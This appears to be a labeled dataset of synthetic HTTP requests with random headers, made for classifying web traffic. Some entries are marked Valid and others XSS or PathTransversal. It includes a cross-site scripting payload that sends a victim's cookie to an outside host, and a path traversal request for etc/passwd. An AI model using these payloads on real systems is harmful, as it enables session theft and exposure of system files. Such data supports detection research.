Warning: 939 www.gttieo.css "to6kdeaosjuise9qIc" "Sun, 24 Oct 04 22:57:30 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 5470041402
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 402
Start - Id: 11561
class: Valid
GET /ehrfDith6bd/onproQeo2qo3nz6x/qt8i4/nw5@0kTlE/%uVunionF8-eqo7qOL/eid6i9aacha6aehml.dll?an2beto=16832&mhqbqnrewnbsHor=157290&PandwrP=ttftdropaefdm&pttehob3O=3 HTTP/1.0
Host: www.go97ht.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=8200
Client-ip: 252.179.56.242
Cookie: ZLO5F=812509;2ndntlery4m=yallmhAhecsr+l
Cookie2: $Version="6"
Date: Thu, 30 Jul 09 22:20:53 GMT
ETag: "6kKejnXPOeRQZgBYU6o"
Expect: i8lao=uUso;tnogrho=e0amF
From: brof7eef@knveh.biz
If-Modified-Since: Sat, 22 Oct 05 09:29:42 UTC
If-Unmodified-Since: Tue, 22 Jul 08 02:51:31 UTC
If-Match: "b5Cv-yDSVhLpebxUe"
If-None-Match: "LVWFMdsD9s1gCKlu"
If-Range: *
Max-Forwards: 81
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic dG5yYWFyQTpPaG5yNGF0
Authorization: Basic dExiRW9pNkE6N3VOb2hm
Range: 557-,-2090,-403052
Referer: http://www.O6ent.gov/snoawda/innic.nsf
TE: gzip;q=0.1,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.5 (Machintosh; U; PPC 0.3; fc-sv; rv:4.8.4) Gecko/10256523
UA-CPU: 68000
UA-Disp: 714,2257,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 827x168
Via: Tiidn/0.5 www.mnif.gif, 1.1 www.oshahle.tiff
Transfer-Encoding: deflate
Upgrade: coz/2.2, taglnO/9.0, cttDo/4.2, taie/2.4
Warning: 655 24.129.249.203 "tyroj4er3ouraNtrCo" 
X-Forwarded-For: 167.33.149.198
X-Serial-Number: 24189
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11561
Start - Id: 19870
class: Valid
GET /trueT5tboxrhme.jpeg?eRnte7osd7Js=02695&w9tihhntvr4tj=tJ7AL2&EuygosBDa=wlfexec%3Esity0a%7CnTnt%5Ba HTTP/1.0
Host: www.reuihN8nn.cz
Connection: close
Accept: audio/*;q=0.9, text/*;q=0.5, image/*;q=0.4
Accept-Charset: x-mac-cyrillic;q=0.5, windows-1250;q=0.2, windows-874;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: on-shnum6n, 9r-snsot9rz;q=0.0, fr1-lo, Yotbmhaq-Vpdbna, nenont9j-eeq6;q=0.0
Cache-Control: deotr=o
Client-ip: 169.241.81.8
Cookie: EuTnsueeECnm=weBIaMBa.;tmp3Bv=0731;bSooeaissz7=etcadocumentuei|6;ealH6wfaobqntel=ee4 dbEl ;xterm6r71xb=4FYs0Qz
Cookie2: $Version="538"
Date: Tue, 28 Mar 06 06:36:36 GMT
ETag: "EOrffeq49PfEhy3d0pn"
Expect: 100-continue
From: ebMr@ot7cggaev.net
If-Modified-Since: Sat, 04 Jul 09 24:38:18 GMT
If-Unmodified-Since: Tue, 10 Apr 07 19:32:36 GMT
If-Match: "aNnvJUAo@ayoHtcg6_F"
If-None-Match: *
If-Range: *
Max-Forwards: 03
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: tIsore haesemqr=7tm5
Authorization: tea1o nhanj=jrinhc
Range: 752-,475-082626,-6481
Referer: /or3qfjE/eA2ti.sh
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 5.6; Re-to; rv:7.1.0) Gecko/39926855
UA-CPU: StrongARM
UA-Disp: 8005,879,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 378x5840
Via: FTP/9.2 98.202.222.16, 0.6 182.84.33.203, 7.6 www.mcohttt.jpeg
Transfer-Encoding: h4nl0a; ebohfe=atyiLus
Upgrade: ieot/7.9
Warning: 622 www.dgcaas.png "crere38dmlecltR" "Fri, 12 Oct 07 12:04:28 CET"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 55629847157981677810
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19870
Start - Id: 34250
class: Valid
PUT /ne1ERoRnK1/n4jp96Jt.-aTxw4EZjJ/9.znSq@zNIHov/t19wKK/e1qM1jLhk.gif? HTTP/1.1
Content-Length: 260
Content-Language: sr9raae,cht
Content-Encoding: deflate
Content-Location: http://www.oeane.uk/sa72to/3es5/aLorR.exe
Content-MD5: ZWFvNm5hdXR4ZW50VW95ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 31 Jul 06 03:56:48 GMT
Last-Modified: Wed, 18 Mar 09 20:16:24 CET
Host: 162.177.125.121
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=84
Client-ip: 207.220.68.217
Cookie: iilHbsesJh=nerN4uOS;rur=p5Ttislot=;dteo12=+y+htacces
Cookie2: $Version="83"
Date: Mon, 09 Feb 09 10:21:35 GMT
ETag: "mC64MIBbw8y2lU14C"
Expect: 100-continue
From: uoRceh@bnhno.gov
If-Modified-Since: Thu, 04 Sep 08 16:05:13 CET
If-Unmodified-Since: Wed, 06 Sep 06 04:15:54 GMT
If-Match: "aHvtBMfydIywReiPcVG"
If-None-Match: "9wZwDxFPjb--nR8ko"
If-Range: "O_6Yk_YlWItGH2EO"
Max-Forwards: 3
MIME-Version: 7.6
Pragma: oaeXaD='1e0G6'
Proxy-Authorization: 7hiun ohh8hes=lTNz
Authorization: NTLM aHVzbzJjZWVpcjdlZmowSHJ3aXJUbnJ0YWVzZWV0NkVlbGRhNm90YjA=
Range: -804943,968106-
Referer: /e6mG/islyk/3nntre.cgi
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: 598ktNwa/9.8.0.2.1
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5781x4344
Via: 0.1 84.176.83.250:1, 9.7 www.ehect.jpeg, xhdi/6.7 171.67.229.42
Transfer-Encoding: deflate
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 954 www.nnennttt.js "hztaw" "Sat, 16 Oct 04 21:52:44 UTC"
X-Forwarded-For: 70.193.7.214
X-Serial-Number: 316874692201616
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

epl=yunno7af9Zaviesusm&rdnsne=d4olngnk&9sO1gnetnbi=tenexecsce\O +e9&33&hiarr=ge&on55re=aonw&3liflltoeth=1517&krsuTrkueH=stnhstwur&nia=6295&es=tcSxUUylthg&y-AMWnr=iXP&Wqyw@b=qdzrpshlcVreta]=riL&dehOoe7ib=87965489&Vr9Jshutdowno78n=61&daromptdrcoo=27986

End - Id: 34250
Start - Id: 47115
class: XSS
GET /ntetiarulteadur/hivedhoinux0pirrSsue.bin?evomii=AiafromtLa0&exspjhdEnrwqzgr=%3Cdiv+style+%3D%22+++background-image%3A++++url%28javascript%3A++++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.orreniol.com%2Fcgi-bin%2Fiearisveal.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22+%3E HTTP/1.1
Host: 73.62.155.225
Connection: slagsa5n
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-h6lie, tr-ti
Cache-Control: max-stale
Client-ip: 223.238.139.168
Cookie: kenloa=Ssietoiihbmifidmu
Cookie2: $Version="0"
Date: Fri, 22 Dec 06 01:20:23 CET
ETag: "vnU_@_vYPqXRe-uJcMr"
Expect: eeOu
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Fri, 07 Jul 06 06:14:28 CET
If-Unmodified-Since: Tue, 03 Feb 09 02:18:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6224
MIME-Version: 7.3
Pragma: 8=B
Proxy-Authorization: Basic aEFkYXNYOnF1ZXVE
Authorization: NTLM cnNzZ2Vhc3RxbnNlN3JwVWZ2YTl3bm50dHNjY3BzZXJud2U1MHh0bQ==
Range: 38-13,-4
Referer: /rdtl/hcroit.dll
TE: gzip,deflate,trailers
Trailer: Connection
User-Agent: Mozilla/7.5 (Windows; U; Win98 0.8; EE-lc; rv:5.1.1) Gecko/88714325
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7372x166
Via: HTTP/0.9 146.105.44.113:2791
Transfer-Encoding: identity
Upgrade: pen/9.1, ccf/6.5
Warning: 086 126.99.38.140:0 "cofaxltfcL1" "Mon, 16 Jan 06 15:09:10 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47115
Start - Id: 4981
class: Valid
PUT /VM4C/aSwhoRcnSeazim0tN.js? HTTP/1.1
Content-Length: 247
Content-Language: d
Content-Encoding: deflate
Content-Location: /psTa/q4wr/dooieiue/aptoT8m.cgi
Content-MD5: bmF0ZWVlcnRyY25yZWR1bw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Jul 05 17:59:10 CET
Last-Modified: Wed, 27 Feb 08 10:14:11 GMT
Host: www.m56JrR.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, compress, deflate;q=0.1
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 105.202.185.52
Cookie: El7Z=tnntxp_ishutdownl16d
Cookie2: $Version="609"
Date: Mon, 19 Jul 04 06:08:54 CET
ETag: "oLIHW8zaTNhFRfwWG3"
Expect: jtdRSzw=syia
From: zqhtasa7@rsaljt.it
If-Modified-Since: Tue, 29 Sep 09 01:00:18 GMT
If-Unmodified-Since: Sun, 24 Jan 10 04:29:59 UTC
If-Match: *
If-None-Match: "fG-LSAqeWA5fXzEW7_.n"
If-Range: Tue, 30 May 06 15:58:22 CET
Max-Forwards: 43
MIME-Version: 8.6
Pragma: 1iodYpim=Nyctea
Proxy-Authorization: re1s oeyla=tamzuv0w
Authorization: NTLM ZHNndUVkbmZmN3IwcnRaZmwzbk9pYWF0ZXJ0bWhob2F6bk5zZWVhZWhlbmU=
Range: -6861,11-204609
Referer: /dotlp/tdesaa/oada/aesvcT.cgi
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: aoLhesmsalaj
UA-CPU: 68000
UA-Disp: 1425,8375,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 527x0259
Via: HTTP/9.7 112.7.88.192
Transfer-Encoding: identity
Upgrade: coejsr/9.9
Warning: 173 28.187.74.144 "intyt8" "Wed, 16 Jan 08 01:05:54 UTC"
X-Forwarded-For: 99.65.168.34
X-Serial-Number: 03530
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

betgnheirpgai04=texs]mvtconnectuxdote&wn2wr4esh0nud=44&Wltgvee8fmubiw=863888843&wCVNnL=toonfTlajeel3fdtae&1inputBvacROJ=a&TUbody-dJV=nyrse&cy7olf6yrao=17523896&pseeynoTtd=24284143&ZTvbscriptj=ri&cr9pevtmna=9499&5I0vEF4g8=e2@&gMXm=esunionoldmrR

End - Id: 4981
Start - Id: 21377
class: Valid
GET /m3ehsnisib/vgNaxwrVKGoFrL.mdb?atIpahhcRintbsw=9&D85nMbgfGEb3=mngI7iframesihavingt&8ainctageezdsg=baroc&hAclEvqu0goo=rNi&p3aoeotLeRnsgt=707&Non2iho30s3=wcgtlriIsE&K7mJF-jstyleeJC=a&0xRstdingddVc=av7Eb1&eueainuebhthq=eoimg+ihexecxstiB HTTP/1.0
Host: 78.142.249.9:80
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 17.180.30.16
Cookie: QIMF0t=lbiahe9it8npth;4oahenidwn=T
Cookie2: $Version="7"
Date: Thu, 02 Oct 08 10:06:23 GMT
ETag: "NH-4d06ZBYMuVX6"
Expect: iece
From: 6nzmsEZ@elsd.cz
If-Modified-Since: Tue, 16 Nov 04 11:21:42 CET
If-Unmodified-Since: Sat, 02 Jun 07 04:53:49 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 28 May 06 08:58:42 UTC
Max-Forwards: 6433
MIME-Version: 7.5
Pragma: ac=nEe
Proxy-Authorization: Basic d2UxZUU6ZGVzY200d0E=
Authorization: xe8l uipg02=cxog
Range: -5
Referer: /fh7e/h0gptis/seayb.dll
TE: chunked;q=0.0,gzip;q=0.0,trailers
Trailer: TE
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 4.7; vl-fl; rv:1.7.1) Gecko/65459331
UA-CPU: x86
UA-Disp: 3983,8389,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 965x768
Via: HTTP/4.6 212.2.192.67, FTP/7.3 157.109.89.212
Transfer-Encoding: deflate
Upgrade: ehr5t1/8.1, ans/4.0, Pae/6.5
Warning: 104 201.244.255.0 "TtHe7ldEfrh" "Sun, 27 Jan 08 03:21:34 CET"
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21377
Start - Id: 46162
class: PathTransversal
GET /p.wULNqRLMX@LiYAk5/twek/iZU2ca1/heheeheednnw3vli4hi/imQKArrbXIJOM3/ywhth/gdtnr9ssyuf/d0saohxbs.swf?aewEhiRsayojinN=rmma&shotobAeen=3&fn=79&eSllnurlfe7rf=7652207&hhmilnb=23414837&Nwc4childjG=r%3Aunion+cevalwo+emoTaoemail&uditijatvaThoi=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&i7hIaRite9ahans=z5To0nph-%2Fpwindow.opens&ueleq=9cneta8&ap1dnS=rrdiw HTTP/1.1
Host: 27.186.95.177
Connection: olz6ws
Accept: audio/x-wav;q=0.7
Accept-Charset: x-mac-cyrillic;q=0.1, koi8;q=0.8, cp-950;q=0.9, iso-2022-kr;q=0.3, windows-1255
Accept-Encoding: gzip;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 172.17.95.67
Cookie: SBaoaram=238
Cookie2: $Version="276"
Date: Tue, 08 Feb 05 08:01:00 GMT
ETag: W/"IKbJLxE1_ixqcRxyA"
Expect: xslbWe=dne4
From: ehreer@1nwhcp.uk
If-Modified-Since: Fri, 26 Sep 08 18:24:30 UTC
If-Unmodified-Since: Mon, 09 May 05 24:55:06 UTC
If-Match: *
If-None-Match: "2gg-LXGHm31C.pJXCfY"
If-Range: Thu, 08 Apr 04 02:32:00 UTC
Max-Forwards: 7602
MIME-Version: 2.2
Pragma: weP='bYtu'
Proxy-Authorization: slso ala9=euegghy
Authorization: Basic dGxkc2FBMHo6b2l6ZUw=
Range: 6-,3215-
Referer: http://www.nmcrpa.fr/y4qitys0/mHsopa6/erIi.wav
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 7.3; ag-t2; rv:3.2.8) Gecko/77032091
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 390x0476
Via: 1.8 www.nm35e1it.jpg, cltxet/4.5 144.206.115.146
Transfer-Encoding: gzip
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 90.173.143.30
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46162
Start - Id: 27365
class: Valid
GET /t-rkQHY@6YsDh2a_LN/e3in/jO0a8vlibTpositionyC/aEhiurfatnlodtrba/xboot.inix0nZ/wra5ipBhle4lNLeb/t_QwJf/co8su6e/rDYqNxmDcqov42/HzyPsUAHJHm-RMe/mRa4dhtc/cmLdarirsostr9.css?esHjihate=2&Cioqmeletra6d=llJwmsre7m9ta6e&SUeqd4lnnega=aHBFjM0K1Y5h&gOdCL=7oSdoeoprodrPdr8Te HTTP/1.0
Host: 11.155.147.107:80
Connection: tapn
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 706saNe-o9oe, t-t53h
Cache-Control: beetAtlb=tRx
Client-ip: 131.181.78.228
Cookie: weutsios8=594
Cookie2: $Version="425"
Date: Sat, 29 Oct 05 19:23:20 GMT
ETag: "3ooz@O1DCCjzfQ_jl"
Expect: 100-continue
From: etr2@eeroi.de
If-Modified-Since: Tue, 24 May 05 17:07:08 GMT
If-Unmodified-Since: Sat, 20 Jun 09 05:06:44 CET
If-Match: *
If-None-Match: "PqQuZiauDwmJ@b149CaT"
If-Range: "HUngjKF@-sPQCc5Q"
Max-Forwards: 517
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: MeYm toondn=clnamd
Authorization: NTLM M2hoaXBRcjlkaVRvY2dlanR6cnduNGVudFBmYXlJYmxoaGRlNQ==
Range: 5279-
Referer: /woeb/s1xTriw/ux9uth/lmeh/stee.css
TE: trailers,trailers,chunked;q=0.8
Trailer: Cache-Control
User-Agent: Mozilla/2.9 (compatible; MSIE 6.9; WinNT; eanayPg6s; hswIrn; Toeaatit5o)
UA-CPU: MIPS
UA-Disp: 4083,795,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9698x542
Via: FTP/5.0 93.140.53.105
Transfer-Encoding: ieon
Upgrade: eeW/8.4, 80lvm/8.7, iuez/6.4
Warning: 877 60.179.127.50 "ccGMviphn5uaaes" "Sun, 24 Jun 07 15:48:47 UTC"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 7259766093580029
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27365
Start - Id: 16051
class: Valid
GET /t0N/qypwherelyNClTy@mcn/fde/s89a.XKBMM6y0N.IX56@/catf65/71a2HT8c0heo/c@xkwRdJR.html?ieNdsenes9=eezAignDabuiiiH&6optPlmailPqUQ=udhidabgg5 HTTP/1.0
Host: www.E5hd.uk:20714
Connection: keep-alive
Accept: video/*, image/*, text/html;q=0.4
Accept-Charset: koi8-r, x-mac-roman, windows-1258;q=0.5, iso-8859-15;q=0.5, big5
Accept-Encoding: gzip;q=0.9
Accept-Language: iaTlc-raotbH;q=0.6, eamxr-gutts;q=0.9, diaetCdy-ehms;q=0.8, Kig-enOcir;q=0.3
Cache-Control: max-stale=25
Client-ip: 157.228.227.207
Cookie: l8wgetBdUSopeniexecb=63651255
Cookie2: $Version="71"
Date: Fri, 10 Oct 08 08:56:51 UTC
ETag: "Z5gkMjZc.n_FexmfUp"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Thu, 25 Feb 10 11:24:45 CET
If-Unmodified-Since: Sat, 25 Oct 08 21:18:06 GMT
If-Match: "RpxI-NSvkRe8tL7h5K4i"
If-None-Match: "bj9AHG6gYP3Whdu42PKi"
If-Range: *
Max-Forwards: 75
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="neh7g"
Authorization: 2sf3h etrr=rg4oe
Range: -94,681209-306844
Referer: http://www.a8dDeaa.uk/ohemas/uenr/09el.bin
TE: trailers,deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: eobheia (mynyI1; 5jscjQsYYc)
UA-CPU: x86
UA-Disp: 738,0570,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 973x791
Via: 5.8 0.123.112.30:1543
Transfer-Encoding: identity
Upgrade: umjt/5.9
Warning: 259 www.nes51.shtml "inanj1ru9kustre5" 
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 0738318676103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16051
Start - Id: 18798
class: Valid
GET /o.Z..0eU6UGg/3lo/DyV7servicesQHQdocumentE3@JO/iaE4M0/scwOXPbAi83VVaCN/yHYoEDbeVu.cgi? HTTP/1.1
Host: 215.135.130.21
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 177.191.160.102
Cookie: nxsrrnae=tsno4rie;VZHoS=28444
Cookie2: $Version="72"
Date: Fri, 08 Jun 07 10:30:37 GMT
ETag: W/"3HCs5i7zVg3zw139a8"
Expect: awm0aS
From: nn9rr@wiueoi.biz
If-Modified-Since: Thu, 25 Nov 04 01:28:52 GMT
If-Unmodified-Since: Wed, 30 Sep 09 12:28:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2635
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: tnendI BbsfCEj=gydc
Authorization: Digest algorithm=MD5-sess
Range: -26166
Referer: /taodi3n/nfoeaie/vttty/cnebAon.bin
TE: deflate;q=0.6,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.9 (X11; U; Linux i386 4.9; lt-yz; rv:7.4.1) Gecko/89316816
UA-CPU: MIPS
UA-Disp: 983,4723,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 017x6703
Via: FTP/1.2 www.Ralh.js, 6.0 www.osglwt.tiff, 0.7 251.115.91.228
Transfer-Encoding: gzip
Upgrade: T21ri/2.9, nerlj/2.8, otr/7.9
Warning: 587 60.189.174.160 "eapBalire2l" "Mon, 19 Apr 04 02:48:51 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 57174297786
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18798
Start - Id: 27913
class: Valid
GET /kl8/1r1WKmv36wRu/ikt9iTec2inh6jbajy/i4BqXQkPmYqde/aM-4jCEU_I3.cT6TrzW/Ei9saiptebndcc/gbodyd3/ip3iRU/gfcvX.j/yRpy3aUIB.mdb? HTTP/1.0
Host: www.ktNugnu.ch
Connection: close
Accept: text/plain, text/plain;q=0.8, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: ltap-5s5Eeour;q=0.2, snr1mwhO-dst;q=0.1, EAlwiee-qoooo, oaaJn-T;q=0.3, iy-us3
Cache-Control: only-if-cached
Client-ip: 217.171.87.254
Cookie: OsystemkaX0XOef=mtq;asu6nhrhrta9=n6
Cookie2: $Version="9"
Date: Thu, 06 Sep 07 02:41:10 CET
ETag: W/"qdzWw_oGdEdkcCjBMa"
Expect: 7rwrf
From: ethjhtno@OeeoEam.be
If-Modified-Since: Sat, 21 Mar 09 24:30:19 UTC
If-Unmodified-Since: Sat, 17 Mar 07 22:01:17 UTC
If-Match: "8vCsfambM9cyuGHtq"
If-None-Match: *
If-Range: Mon, 05 Apr 04 01:15:06 CET
Max-Forwards: 13
MIME-Version: 6.2
Pragma: o='E'
Proxy-Authorization: NTLM dGRuZW93a292cHpldGduZWV0b2F5Z2x0bmVFb29hcmRBaWxlZW9zcXRodHA=
Authorization: NTLM dGlzYmdndXJlc2F0ZW9saXJ3bnlpYnJkaXhVeGRidG9zczRxaGlzQTIxaHJhbw==
Range: -7,3520-,31-
Referer: http://arci.fr/ecia.shtml
TE: trailers,trailers,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/2.7 (X11; U; Open BSD i586 3.7; ia-sv; rv:7.3.2) Gecko/39574164
UA-CPU: Sparc
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 064x094
Via: 3.1 www.eepg.js, fitea/6.1 www.ngh28ug.tiff, 8.0 www.e69sqtAe.htm:4
Transfer-Encoding: deflate
Upgrade: 2rp/1.4, 9p3l/6.4, s2li/1.7
Warning: 691 www.sindzeae.jpg:0 "9mntxonwreh" "Thu, 27 May 04 12:00:03 GMT"
X-Forwarded-For: 141.34.54.32
X-Serial-Number: 149066712456
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27913
Start - Id: 11447
class: Valid
GET /Wte6medmren/sh7vrXXOLVlkA3kJS/stAnEeN/odR6on/ga/2B3samQ5oqAKil/2XlWJVnXuy76-u.MW2AL/aJZZHdtd3E.sh?sEde7=Znm&nrhdvsUd=5eureplacen42Ineetrvt&hyemoa=neq&EaernrNinVaec=giebt&e6=ea-echornrvnxinputnox&Dp61er=t%24x%2F&eoOaqnrehthtd=31719915&mebwxhesp=rarde2sep%3F%24dtapositionbetween%3Cxml%2F HTTP/1.0
Host: www.6tan.ch:80
Connection: sw5ues
Accept: video/*;q=0.6, video/mpeg, image/jpeg;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, compress
Accept-Language: mi-b1ctl;q=0.2, ioeims-neng;q=0.1, ty-tae;q=0.1, a-s4atrler, oe-raxlDidr;q=0.9
Cache-Control: no-cache
Client-ip: 243.115.149.17
Cookie: RrD7childH9yopenpassthru.x=Jbingot qk;aAonasstntaittp=aphp7cur;ete=n;trbebrket1=86;EchildWM=wUimd3srga
Cookie2: $Version="36"
Date: Fri, 14 Nov 08 06:23:58 CET
ETag: W/"R51MOFyEAdg@_kqyEB"
Expect: totohex=namfajg
From: ezBfko@fesnitr.uk
If-Modified-Since: Tue, 01 Feb 05 15:10:58 UTC
If-Unmodified-Since: Sat, 07 Nov 09 20:03:12 GMT
If-Match: "1GxTpTT.ncnv17KjBZ"
If-None-Match: *
If-Range: Thu, 22 Jan 04 12:25:31 GMT
Max-Forwards: 6
MIME-Version: 0.2
Pragma: paeseto=ma
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic YWVpcjpoNHh1ZA==
Range: 17-873364,-1915
Referer: http://www.d6pmxi.de/DEhxh2/Ceetsf/fAst/6iaihq/Lea4.mspx
TE: deflate,trailers
Trailer: From
User-Agent: erocts/1.0.8.9.7
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 514x0544
Via: 0.4 57.54.245.149:3497
Transfer-Encoding: sIrC; nkubue7=tgFsaRs
Upgrade: csih/5.7
Warning: 907 www.lxlrE.htm "iLeehceeken" "Wed, 25 Jul 07 20:19:51 GMT"
X-Forwarded-For: 226.58.176.229
X-Serial-Number: 0375108727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11447
Start - Id: 12308
class: Valid
GET /ruV-fi853ODs/euarfttauers4OU/6EVfZLUcO_A/osqgxaefoohzaee.png? HTTP/1.1
Host: www.aernc.biz:711
Connection: close
Accept: application/zip
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ed-avto6s, 6rtdt-eaiHha0;q=0.6, qede3zai-u, lqn8tda-t9vrpmOn, iFhH-l;q=0.3
Cache-Control: atds=n
Client-ip: 49.9.133.115
Cookie: aiOtpRbilwgy=seet$rn
Cookie2: $Version="74"
Date: Tue, 24 Oct 06 20:41:53 UTC
ETag: "yXiY22b@llRr0lLdmn"
Expect: 100-continue
From: iman0m@blrqt7ti.gov
If-Modified-Since: Tue, 12 Jun 07 21:36:25 GMT
If-Unmodified-Since: Sun, 30 May 04 04:20:45 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Dec 05 21:02:42 UTC
Max-Forwards: 365
MIME-Version: 2.7
Pragma: tt=IhRoae
Proxy-Authorization: Basic ZWZoSHAyYzpkbjh5ZTh5eA==
Authorization: Digest nonce
Range: 53-93,362543-
Referer: /uwoncrri/1gooFt/seeihy.png
TE: trailers
Trailer: Host
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 5.4; os-id; rv:1.1.0) Gecko/10049981
UA-CPU: 68000
UA-Disp: 1104,1931,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4392x5610
Via: 5.8 199.127.195.100:19, e1eGsw/2.4 www.otrdeOye.htm, ub9/9.3 www.Ruoduwta.jpeg
Transfer-Encoding: gzip
Upgrade: lwuepe/6.4, pao/4.1
Warning: 542 www.ouhyte.jpeg "Gsrfo4dsrHenieOoa" 
X-Forwarded-For: 55.96.214.140
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12308
Start - Id: 7590
class: Valid
POST /4eAservicesTL/589T/7n2JtrlaRwl4ensjkre.css? HTTP/1.0
Content-Length: 276
Content-Language: lteeoTas
Content-Encoding: deflate
Content-Location: /tsosen.png
Content-MD5: YU1paWxidWxkaWF1OGRvSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Jul 04 07:32:16 UTC
Last-Modified: Sun, 09 Oct 05 11:00:55 GMT
Host: www.AWlahdlTds.gov
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.6
Cache-Control: hy57teg=Hvp
Client-ip: 202.177.178.10
Cookie: ianltteso=e;O0tmorq8?blN;tsothsrn=n1RhdoEtsiedy;zyahcsbhsr=u/e+s(qbody/swdboot.inihA;03b=oyrgf4e6
Cookie2: $Version="58"
Date: Fri, 27 Oct 06 19:05:44 UTC
